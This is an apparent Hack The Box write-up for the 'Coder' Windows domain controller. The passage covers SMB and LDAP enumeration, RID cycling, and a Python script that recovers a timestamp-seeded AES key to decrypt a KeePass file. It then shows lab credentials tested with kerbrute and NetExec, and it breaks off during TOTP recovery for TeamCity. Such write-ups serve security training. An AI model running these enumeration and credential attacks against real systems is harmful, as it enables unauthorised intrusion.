# Coder - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Coder was an exhilarating, insane-rated HTB Windows machine created by [ctrlzero](https://app.hackthebox.com/users/168546)

We get to deal with KeePass database, TOTP, and TeamCity in this box.  
It has lots of reverse engineering and some cryptography steps, and the cherry on top is ADCS exploitation (ESC5).


## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.207
Nmap scan report for 10.10.11.207
Host is up (0.21s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE    SERVICE
53/tcp    open     domain
80/tcp    open     http
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
443/tcp   open     https
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
5985/tcp  open     wsman
9389/tcp  open     adws
47001/tcp open     winrm
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49671/tcp open     unknown
49674/tcp open     unknown
49675/tcp open     unknown
49676/tcp open     unknown
49681/tcp open     unknown
49688/tcp open     unknown
49755/tcp open     unknown
59915/tcp open     unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,80,88,135,139,389,443,445,464,593,636,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49688,49755,59915 -oN coder.nmap 10.10.11.207
Nmap scan report for 10.10.11.207
Host is up (0.21s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
80/tcp    open   http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-06 19:46:30Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-06T19:47:40+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.coder.htb, DNS:coder.htb, DNS:CODER
| Not valid before: 2023-11-21T23:06:46
|_Not valid after:  2033-11-21T23:16:46
443/tcp   open   ssl/http      Microsoft IIS httpd 10.0
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=default-ssl/organizationName=HTB/stateOrProvinceName=CA/countryName=US
| Not valid before: 2022-11-04T17:25:43
|_Not valid after:  2032-11-01T17:25:43
|_ssl-date: 2024-01-06T19:47:38+00:00; +7h59m59s from scanner time.
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.coder.htb, DNS:coder.htb, DNS:CODER
| Not valid before: 2023-11-21T23:06:46
|_Not valid after:  2033-11-21T23:16:46
|_ssl-date: 2024-01-06T19:47:38+00:00; +7h59m59s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49671/tcp open   msrpc         Microsoft Windows RPC
49674/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open   msrpc         Microsoft Windows RPC
49676/tcp open   msrpc         Microsoft Windows RPC
49681/tcp open   msrpc         Microsoft Windows RPC
49688/tcp open   msrpc         Microsoft Windows RPC
49755/tcp open   msrpc         Microsoft Windows RPC
59915/tcp open   msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-06T19:47:28
|_  start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.207 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=coder,DC=htb
ldapServiceName: coder.htb:dc01$@CODER.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=coder,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=coder,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=coder,DC=htb
namingContexts: DC=coder,DC=htb
namingContexts: CN=Configuration,DC=coder,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=coder,DC=htb
namingContexts: DC=DomainDnsZones,DC=coder,DC=htb
namingContexts: DC=ForestDnsZones,DC=coder,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 197785
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=coder,DC=htb
dnsHostName: dc01.coder.htb
defaultNamingContext: DC=coder,DC=htb
currentTime: 20240104014645.0Z
configurationNamingContext: CN=Configuration,DC=coder,DC=htb
```

We have the FQDN `dc01.coder.htb` here; we can add it to `/etc/hosts`:

```text
10.10.11.207 dc01.coder.htb coder.htb dc01
```

Both ports 80 and 443 lead to the default IIS website.  

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@1ca5c756c728:~# echo '10.10.11.207 dc01.coder.htb coder.htb dc01' >> /etc/hosts
```

Testing for null session:

```console
root@1ca5c756c728:~# nxc smb 10.10.11.207 -d coder.htb -u '' -p '' --shares
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.207    445    DC01             [+] coder.htb\: 
SMB         10.10.11.207    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@1ca5c756c728:~# nxc smb 10.10.11.207 -d coder.htb -u 'opcode' -p '' --shares
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.207    445    DC01             [+] coder.htb\opcode: 
SMB         10.10.11.207    445    DC01             [*] Enumerated shares
SMB         10.10.11.207    445    DC01             Share           Permissions     Remark
SMB         10.10.11.207    445    DC01             -----           -----------     ------
SMB         10.10.11.207    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.207    445    DC01             C$                              Default share
SMB         10.10.11.207    445    DC01             Development     READ            
SMB         10.10.11.207    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.207    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.207    445    DC01             SYSVOL                          Logon server share 
SMB         10.10.11.207    445    DC01             Users           READ            
```

Guest sessions are enabled.  
Since the share `IPC$` is readable, we can perform RID cycling:

```console
root@1ca5c756c728:~# nxc smb 10.10.11.207 -d coder.htb -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.207    445    DC01             [+] coder.htb\opcode: 
SMB         10.10.11.207    445    DC01             498: CODER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             500: CODER\Administrator (SidTypeUser)
SMB         10.10.11.207    445    DC01             501: CODER\Guest (SidTypeUser)
SMB         10.10.11.207    445    DC01             502: CODER\krbtgt (SidTypeUser)
SMB         10.10.11.207    445    DC01             512: CODER\Domain Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             513: CODER\Domain Users (SidTypeGroup)
SMB         10.10.11.207    445    DC01             514: CODER\Domain Guests (SidTypeGroup)
SMB         10.10.11.207    445    DC01             515: CODER\Domain Computers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             516: CODER\Domain Controllers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             517: CODER\Cert Publishers (SidTypeAlias)
SMB         10.10.11.207    445    DC01             518: CODER\Schema Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             519: CODER\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             520: CODER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.207    445    DC01             521: CODER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             522: CODER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             525: CODER\Protected Users (SidTypeGroup)
SMB         10.10.11.207    445    DC01             526: CODER\Key Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             527: CODER\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             553: CODER\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.207    445    DC01             571: CODER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.207    445    DC01             572: CODER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.207    445    DC01             1000: CODER\DC01$ (SidTypeUser)
SMB         10.10.11.207    445    DC01             1101: CODER\DnsAdmins (SidTypeAlias)
SMB         10.10.11.207    445    DC01             1102: CODER\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.207    445    DC01             1106: CODER\e.black (SidTypeUser)
SMB         10.10.11.207    445    DC01             1107: CODER\c.cage (SidTypeUser)
SMB         10.10.11.207    445    DC01             1108: CODER\j.briggs (SidTypeUser)
SMB         10.10.11.207    445    DC01             1109: CODER\l.kang (SidTypeUser)
SMB         10.10.11.207    445    DC01             1110: CODER\s.blade (SidTypeUser)
SMB         10.10.11.207    445    DC01             2101: CODER\PKI Admins (SidTypeGroup)
SMB         10.10.11.207    445    DC01             3601: CODER\Software Developers (SidTypeGroup)
SMB         10.10.11.207    445    DC01             5101: CODER\svc_teamcity (SidTypeUser)
SMB         10.10.11.207    445    DC01             8601: CODER\BuildAgent Mgmt (SidTypeGroup)
```

The RID values post 1100 refer to non-default users and groups.  
The share `Development` and `Users` are readable; we can have a look with `smbclient`:

```console
opcode@debian$ smbclient //coder.htb/Users -U 'opcode' -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Nov  4 01:38:38 2022
  ..                                 DR        0  Fri Nov  4 01:38:38 2022
  Default                           DHR        0  Wed Jun 29 09:41:21 2022
  desktop.ini                       AHS      174  Sat Sep 15 12:46:48 2018
  Public                             DR        0  Wed Jun 29 08:44:56 2022

        6232831 blocks of size 4096. 937712 blocks available
```

Nothing interesting is present in the `Users` share.

```console
opcode@debian$ smbclient //coder.htb/Development -U 'opcode' -N
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

It was a bad idea. I killed the download after 40 minutes. There were entire open-source projects and multiple git repositories within:

![1](images/1.png)

I thoroughly checked the repositories for secrets but could not find anything.  
`Get-ADCS_Report.ps1` is a PowerShell script to check whether certificates are expired, and `hello_world.ps1` is a hello world program.  
Rest are open-source programs: [bootstrap-responsive-web-application-template](https://github.com/pro-dev-ph/bootstrap-responsive-web-application-template), [cachet](https://github.com/cachethq/cachet) and [kimchi](https://github.com/kimchi-project/kimchi)

We need to look into the files `Encrypter.exe` and `s.blade.enc`.  

## .NET Reversing

```console
opcode@debian$ file Encrypter.exe      
Encrypter.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
opcode@debian$ file s.blade.enc                             
s.blade.enc: data
```

It is a .NET application, and [dotPeek](https://www.jetbrains.com/decompiler/) can be used for reverse engineering.  
I opened `Encrypter.exe` and navigated to class `AES` in the root namespace:

```cs
using System;
using System.IO;
using System.Security.Cryptography;

internal class AES
{
  public static void Main(string[] args)
  {
    if (args.Length != 1)
    {
      Console.WriteLine("You must provide the name of a file to encrypt.");
    }
    else
    {
      FileInfo fileInfo = new FileInfo(args[0]);
      string destFile = Path.ChangeExtension(fileInfo.Name, ".enc");
      Random random = new Random(Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds()));
      byte[] numArray1 = new byte[16];
      random.NextBytes(numArray1);
      byte[] numArray2 = new byte[32];
      random.NextBytes(numArray2);
      AES.EncryptFile(fileInfo.Name, destFile, numArray2, numArray1);
    }
  }

  private static byte[] EncryptFile(string sourceFile, string destFile, byte[] Key, byte[] IV)
  {
    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
    {
      using (FileStream fileStream1 = new FileStream(destFile, FileMode.Create))
      {
        using (ICryptoTransform encryptor = rijndaelManaged.CreateEncryptor(Key, IV))
        {
          using (CryptoStream cryptoStream = new CryptoStream((Stream) fileStream1, encryptor, CryptoStreamMode.Write))
          {
            using (FileStream fileStream2 = new FileStream(sourceFile, FileMode.Open))
            {
              byte[] buffer = new byte[1024];
              int count;
              while ((count = fileStream2.Read(buffer, 0, buffer.Length)) != 0)
                cryptoStream.Write(buffer, 0, count);
            }
          }
        }
      }
    }
    return (byte[]) null;
  }
}
```

From the [official Microsoft documentation](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.rijndaelmanaged.mode?view=netcore-3.0), we can learn that the default mode for `RijndaelManaged` is CBC.  
Therefore, `Encrypter.exe` uses AES-CBC to encrypt the contents of a specified file. The key and IV are derived using the `Random` class, seeded with the current epoch time.

We can use `smbclient` to find the timestamp:

```console
opcode@debian$ smbclient //coder.htb/Development -U 'opcode' -N
Try "help" to get a list of possible commands.
smb: \> cd "Temporary Projects""
smb: \Temporary Projects\> ls
  .                                   D        0  Sat Nov 12 03:49:03 2022
  ..                                  D        0  Sat Nov 12 03:49:03 2022
  Encrypter.exe                       A     5632  Fri Nov  4 22:21:59 2022
  s.blade.enc                         A     3808  Sat Nov 12 03:47:08 2022

    6232831 blocks of size 4096. 1048524 blocks available
```

`smbclient` preemptively adjusts timestamps to our timezones, so we can simply use `date` to get the epoch time:

```console
opcode@debian$ date -d "2022-11-12 03:47:08" +%s
1668205028
```

The obtained epoch time can be used to seed the `Random` class in C# and generate key and IV to be used with AES-CBC to decrypt the file.  
Throughout my engagement in various CTFs, I've implemented the random function from different programming languages in Python.  
I used the [.NET implementation](https://referencesource.microsoft.com/#mscorlib/system/random.cs) on this box, [dotnetrandom.py](dotnetrandom.py):

```py
from math import fmod
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


def int32(x):
    x = x & 0xFFFFFFFF
    return (x ^ 0x80000000) - 0x80000000


class Random:
    def __init__(self, seed):
        self.inext = 0
        self.inextp = 21
        self.SeedArray = [0] * 56
        self.MBIG = 2**31 - 1
        self.MSEED = 161803398

        subtraction = self.MBIG if seed == -(self.MBIG + 1) else abs(int32(seed))
        mj = self.MSEED - subtraction
        self.SeedArray[55] = mj

        mk = 1
        for i in range(1, 55):
            ii = (21 * i) % 55
            self.SeedArray[ii] = int32(mk)
            mk = mj - mk
            mk = mk + self.MBIG if mk < 0 else mk
            mj = self.SeedArray[ii]

        for _ in range(4):
            for i in range(1, 56):
                self.SeedArray[i] -= self.SeedArray[(i + 30) % 55 + 1]
                self.SeedArray[i] = int32(self.SeedArray[i])

                if self.SeedArray[i] < 0:
                    self.SeedArray[i] += self.MBIG

    def InternalSample(self):
        locINext = self.inext
        locINextp = self.inextp

        locINext = 1 if (locINext + 1 >= 56) else locINext + 1
        locINextp = 1 if (locINextp + 1 >= 56) else locINextp + 1

        retVal = self.SeedArray[locINext] - self.SeedArray[locINextp]

        retVal = retVal - 1 if retVal == self.MBIG else retVal
        retVal = retVal + self.MBIG if retVal < 0 else retVal

        self.SeedArray[locINext] = retVal
        self.inext = locINext
        self.inextp = locINextp

        return retVal

    def NextBytes(self, length):
        buffer = []
        for i in range(length):
            buffer.append(int(fmod(self.InternalSample(), 256)))

        return bytes(buffer)


if __name__ == "__main__":
    with open("s.blade.enc", "rb") as f:
        encrypted = f.read()

    r = Random(1668205028)
    iv = r.NextBytes(16)
    key = r.NextBytes(32)

    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(encrypted)
    plaintext = unpad(plaintext, 16)

    with open("s.blade", "wb") as f:
        f.write(plaintext)
```

```console
opcode@debian$ python3 dotnetrandom.py
```

After running the script, we'd get `s.blade` file:

```console
opcode@debian$ file s.blade    
s.blade: 7-zip archive data, version 0.4
```

Extract with `7z`:

```console
opcode@debian$ 7z x -bb1 s.blade

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_IN,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz (906E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3799 bytes (4 KiB)

Extracting archive: s.blade
--
Path = s.blade
Type = 7z
Physical Size = 3799
Headers Size = 177
Method = LZMA2:12
Solid = -
Blocks = 2

- .key
- s.blade.kdbx
Everything is Ok

Files: 2
Size:       3614
Compressed: 3799
```

## Decrypting KeePass database

```console
opcode@debian$ file s.blade.kdbx 
s.blade.kdbx: Keepass password database 2.x KDBX
```

We can use `kpcli` to interact with KeePass database.  
I left the master password blank.

```console
opcode@parrot$ sudo apt-get install kpcli
opcode@parrot$ Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. Authenticator backup codes                                             
1. O365                                                                   
2. Teamcity                                         teamcity-dev.coder.htb
kpcli:/Root> show 0

Title: Authenticator backup codes
Uname: 
 Pass: 
  URL: 
Notes: {
         "6132e897-44a2-4d14-92d2-12954724e83f": {
           "encrypted": true,
           "hash": "6132e897-44a2-4d14-92d2-12954724e83f",
           "index": 1,
           "type": "totp",
           "secret": "U2FsdGVkX1+3JfFoKh56OgrH5jH0LLtc+34jzMBzE+QbqOBTXqKvyEEPKUyu13N2",
           "issuer": "TeamCity",
           "account": "s.blade"
         },
         "key": {
           "enc": "U2FsdGVkX19dvUpQDCRui5XaLDSbh9bP00/1iBSrKp7102OR2aRhHN0s4QHq/NmYwxadLeTN7Me1a3LrVJ+JkKd76lRCnd1utGp/Jv6w0hmcsqdhdccOpixnC3wAnqBp+5QyzPVaq24Z4L+Rx55HRUQVNLrkLgXpkULO20wYbQrJYN1D8nr3g/G0ukrmby+1",
           "hash": "$argon2id$v=19$m=16384,t=1,p=1$L/vKleu5gFis+GLZbROCPw$OzW14DA0kdgIjCbo6MPDYoh+NEHnNCNV"
         }
       }

kpcli:/Root> show 1

Title: O365
Uname: s.blade@coder.htb
 Pass: AmcwNO60Zg3vca3o0HDrTC6D
  URL: 
Notes: 

kpcli:/Root> show 2

Title: Teamcity
Uname: s.blade
 Pass: veh5nUSZFFoqz9CrrhSeuwhA
  URL: https://teamcity-dev.coder.htb
Notes: 
```

One of those credentials is valid on the Active Directory:

```console
opcode@parrot$ sudo ntdate coder.htb
opcode@parrot$ kerbrute bruteuser --dc 10.10.11.207 -d coder.htb ~/passwords.txt s.blade -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/13/24 - Ronnie Flathers @ropnop

2024/01/13 01:20:27 >  Using KDC(s):
2024/01/13 01:20:27 >   10.10.11.207:88

2024/01/13 01:20:33 >  [!] s.blade@coder.htb:veh5nUSZFFoqz9CrrhSeuwhA - Invalid password
2024/01/13 01:20:33 >  [+] VALID LOGIN:  s.blade@coder.htb:AmcwNO60Zg3vca3o0HDrTC6D
2024/01/13 01:20:33 >  Done! Tested 2 logins (1 successes) in 6.153 seconds
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@1ca5c756c728:~# nxc smb 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' --shares
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.207    445    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
SMB         10.10.11.207    445    DC01             [*] Enumerated shares
SMB         10.10.11.207    445    DC01             Share           Permissions     Remark
SMB         10.10.11.207    445    DC01             -----           -----------     ------
SMB         10.10.11.207    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.207    445    DC01             C$                              Default share
SMB         10.10.11.207    445    DC01             Development     READ            
SMB         10.10.11.207    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.207    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.207    445    DC01             SYSVOL          READ            Logon server share 
SMB         10.10.11.207    445    DC01             Users           READ            
```

No new shares are accessible.  
I also check a few other things:

```console
root@1ca5c756c728:~# nxc smb 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M enum_av
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.207    445    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
ENUM_AV     10.10.11.207    445    DC01             Found NOTHING!

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M adcs
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
ADCS        10.10.11.207    389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS                                                Found PKI Enrollment Server: dc01.coder.htb
ADCS                                                Found CN: coder-DC01-CA

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M maq
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
MAQ         10.10.11.207    389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.11.207    389    DC01             MachineAccountQuota: 0
```

And some groups:

```console
root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
GROUP-ME... 10.10.11.207    389    DC01             [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.11.207    389    DC01             e.black

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='Domain Admins'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
GROUP-ME... 10.10.11.207    389    DC01             [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.11.207    389    DC01             Administrator

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='Protected Users'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='Domain Computers'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='PKI Admins'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
GROUP-ME... 10.10.11.207    389    DC01             [+] Found the following members of the PKI Admins group:
GROUP-ME... 10.10.11.207    389    DC01             e.black

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='Software Developers'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
GROUP-ME... 10.10.11.207    389    DC01             [+] Found the following members of the Software Developers group:
GROUP-ME... 10.10.11.207    389    DC01             j.briggs
GROUP-ME... 10.10.11.207    389    DC01             s.blade

root@1ca5c756c728:~# nxc ldap 10.10.11.207 -d coder.htb -u 's.blade' -p 'AmcwNO60Zg3vca3o0HDrTC6D' -M group-mem -o group='BuildAgent Mgmt'
SMB         10.10.11.207    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:coder.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.207    636    DC01             [+] coder.htb\s.blade:AmcwNO60Zg3vca3o0HDrTC6D 
GROUP-ME... 10.10.11.207    389    DC01             [+] Found the following members of the BuildAgent Mgmt group:
GROUP-ME... 10.10.11.207    389    DC01             s.blade
```

The user `e.black` is present in groups `Remote Management Users` and `PKI Admins`.  
This box also has PKI.  
Our current user, `s.blade` is present in groups `Software Developers` and `BuildAgent Mgmt`, but not in `Remote Management Users`. Therefore, we cannot get a WinRM shell.

## TeamCity and recovering Authenticator code

Aside from the credentials, Authenticator backup codes and the subdomain <https://teamcity-dev.coder.htb> were also present in the KeePass database.  
Therefore, we can update `/etc/hosts`:

```text
10.10.11.207 dc01.coder.htb coder.htb dc01 teamcity-dev.coder.htb
```

On <https://teamcity-dev.coder.htb>, an instance of TeamCity is running. It is a CI/CD solution from JetBrains.

![2](images/2.png)

The credentials `s.blade:veh5nUSZFFoqz9CrrhSeuwhA` work, but two-factor authentication is enabled.  
Thankfully, Authenticator backup codes are available to us.

```json
{
 "6132e897-44a2-4d14-92d2-12954724e83f": {
   "encrypted": true,
   "hash": "6132e897-44a2-4d14-92d2-12954724e83f",
   "index": 1,
   "type": "totp",
   "secret": "U2FsdGVkX1+3JfFoKh56OgrH5jH0LLtc+34jzMBzE+QbqOBTXqKvyEEPKUyu13N2",
   "issuer": "TeamCity",
   "account": "s.blade"
 },
 "key": {
   "enc": "U2FsdGVkX19dvUpQDCRui5XaLDSbh9bP00/1iBSrKp7102OR2aRhHN0s4QHq/NmYwxadLeTN7Me1a3LrVJ+JkKd76lRCnd1utGp/Jv6w0hmcsqdhdccOpixnC3wAnqBp+5QyzPVaq24Z4L+Rx55HRUQVNLrkLgXpkULO20wYbQrJYN1D8nr3g/G0ukrmby+1",
   "hash": "$argon2id$v=19$m=16384,t=1,p=1$L/vKleu5gFis+GLZbROCPw$OzW14DA0kdgIjCbo6MPDYoh+NEHnNCNV"
 }
}
```

`argon2id` is one of the most robust hashing algorithms out there; I don't think brute force is the way.  
I tried using KeePassXC since it supports TOTP, but the backup codes are not for KeePassXC.  
I tried using it with Google Authenticator on my phone, but the backup codes there are of format:

```text
otpauth://totp/hub.docker.com:opcode?algorithm=SHA1&digits=6&issuer=hub.docker.com&period=30&secret=WHBW2YYYYYYYY000000XXXXXXXXXXXXX
```

I also wanted to try Microsoft Authenticator on the phone, but I could not find a way to export backup files.  
Finally, I came across the browser extension [Authenticator](https://authenticator.cc/)  
